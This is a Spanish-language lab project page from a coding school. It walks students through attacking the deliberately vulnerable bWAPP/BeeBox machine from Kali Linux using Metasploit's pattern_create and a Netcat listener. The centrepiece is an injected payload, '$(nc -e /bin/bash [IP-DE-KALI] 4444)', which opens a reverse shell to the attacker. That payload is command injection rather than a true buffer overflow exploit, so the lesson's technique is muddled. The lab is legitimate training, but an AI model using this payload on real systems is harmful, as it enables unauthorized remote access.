A tu propio ritmo

Explora nuestra extensa colección de cursos diseñados para ayudarte a dominar varios temas y habilidades. Ya seas un principiante o un aprendiz avanzado, aquí hay algo para todos.

Bootcamp

Aprende en vivo

Únete a nosotros en nuestros talleres gratuitos, webinars y otros eventos para aprender más sobre nuestros programas y comenzar tu camino para convertirte en desarrollador.

Próximos eventos en vivo

Catálogo de contenidos

Para los geeks autodidactas, este es nuestro extenso catálogo de contenido con todos los materiales y tutoriales que hemos desarrollado hasta el día de hoy.

Tiene sentido comenzar a aprender leyendo y viendo videos sobre los fundamentos y cómo funcionan las cosas.

Buscar en lecciones


IngresarEmpezar

Regístrate en 4Geeks

← Volver a Proyectos

Explotación de desbordamiento de buffer

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Buffer overflow exploit

🌱 ¿Cómo empezar este proyecto?

Este ejercicio tiene como objetivo aprender a identificar y explotar vulnerabilidades de buffer overflow. A través de este proyecto entenderás cómo los desbordamientos de buffer pueden ser utilizados para ejecutar código arbitrario, así como a aplicar técnicas de explotación para comprometer la seguridad de la aplicación.

Requisitos

  • Máquina Kali (atacante)
  • Máquina Beebox

📝 Instrucciones

  1. Verifica que tanto Kali Linux como BeeBox estén conectadas en la misma red. Puedes hacer esto comprobando las direcciones IP asignadas a cada máquina y asegurándote de que pueden comunicarse entre sí.

  2. Verifica la conectividad. Desde Kali, intenta hacer ping a BeeBox y viceversa para confirmar que la conexión de red está funcionando.

    1ping [IP-DE-BEEBOX] 2ping [IP-DE-KALI]
  3. Inicia sesión en la máquina BeeBox.

  4. Encuentra el hash relacionado con la vulnerabilidad (esto puede ser parte de la configuración o el código).

Verificar la Vulnerabilidad de desbordamiento de búfer

  1. Ingresa un nombre de película que esté en la base de datos de bWAPP (por ejemplo, Hulk, Iron Man).

  2. Luego ingresa un nombre de película que no esté en la base de datos (por ejemplo, Harry Potter).

  3. Ejecuta el siguiente comando para ver el contenido del archivo bof_1.php:

    1cat /var/www/bWAPP/bof_1.php

    El objetivo es entender cómo se maneja el input del título de la película y cómo se pasa como argumento de línea de comandos a la aplicación. Busca indicios de desbordamiento de búfer.

Generar y usar la Cadena de Explotación

  1. Generar la cadena de explotación ejecutando el siguiente comando en Kali para generar una cadena que te ayudará a identificar el desbordamiento de búfer:
1 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 360
  1. Guarda la cadena generada en un archivo llamado pattern_chain.txt:
1 echo "Aa0Aa1Aa2Aa3Aa4Aa5..." > pattern_chain.txt
  1. Inicia un servidor HTTP en Kali para transferir el archivo:
1python3 -m http.server 8080
  1. Descarga el archivo pattern_chain.txt en BeeBox usando wget:
1wget http://[IP-DE-KALI]:8080/pattern_chain.txt
  1. Lee el contenido del archivo descargado en BeeBox:
1cat pattern_chain.txt

Inyectar la cadena de explotación y el payload

  1. Usa la cadena generada con pattern_create.rb en el campo o parámetro que pueda causar el desbordamiento de búfer en bWAPP.

imagen 1

El objetivo seria ver cómo responde la aplicación a una entrada que excede el tamaño esperado.

  1. Ejecuta un listener en Kali para recibir la shell remota:
1nc -lvnp 4444
  1. Para obtener una shell remota, inyecta el siguiente payload en el campo que causa el desbordamiento:
1 $(nc -e /bin/bash [IP-DE-KALI] 4444)

Reemplaza [IP-DE-KALI] con la dirección IP de tu máquina Kali.

  1. Confirmar la conexión en Kali. Si el exploit es exitoso, deberías ver una conexión en el listener de Kali y recibir un prompt de Bash.

Verificar los Logs del Servidor

  1. Revisa los logs del servidor web en BeeBox para cualquier mensaje relacionado con el desbordamiento de búfer:
1sudo cat /var/log/apache2/error.log

imagen 1

Regístrate para obtener acceso al tutorial interactivo

Lo usaremos para darte acceso a la comunidad.
¿Ya tienes una cuenta? Inicia sesión aquí.

Al registrarte estás aceptando nuestros Términos y condiciones y Política de privacidad.

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Regístrate para obtener acceso al tutorial interactivo

Lo usaremos para darte acceso a la comunidad.
¿Ya tienes una cuenta? Inicia sesión aquí.

Al registrarte estás aceptando nuestros Términos y condiciones y Política de privacidad.

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías

Dificultad

  • intermediate

Duración promedio

2 hrs

Tecnologías